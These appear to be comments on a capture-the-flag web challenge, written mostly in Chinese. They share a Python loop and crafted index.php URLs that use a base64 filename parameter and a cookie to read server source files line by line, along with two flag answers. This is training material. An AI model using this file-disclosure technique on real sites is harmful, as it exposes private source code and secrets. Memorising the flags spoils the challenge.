import requests a=25 for i in range(a): url="xxxxx/index.php?line="+str(i)+"&filename=aW5kZXgucGhw==" s=requests.get(url) print(s.text) 跑出源码来就知道怎么做啦:)
url中只需要把文件名改成keys.php的64编码,然后在加上cookie发包,页面为空,f12查看flag
大佬厉害
for i in range(30): headers = { "user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36&q
bp不行的可以试试yakit,比较简单的设置cookie
url/index.php?line=&filename=a2V5cy5waHA== margin=margin用hackbar亲测有效
编码,文件猜测,python脚本获取源代码,设置cookie
flag{ce763cb4f9f5256380abe9ae5f63d087}
打开后302跳转,两个参数line和file,并且file是base64的keys.txt。通过file修改为aW5kZXgucGhw (index.php),通过line参数逐步遍历源码。再找到cookie和keys.php,同理列出flag。
flag{080e1ca9d838cf6dc00c3efb671b4156}
火狐浏览器hackbar Url + /index.php?line=&filename=a2V5cy5waHA= cookies:margin=margin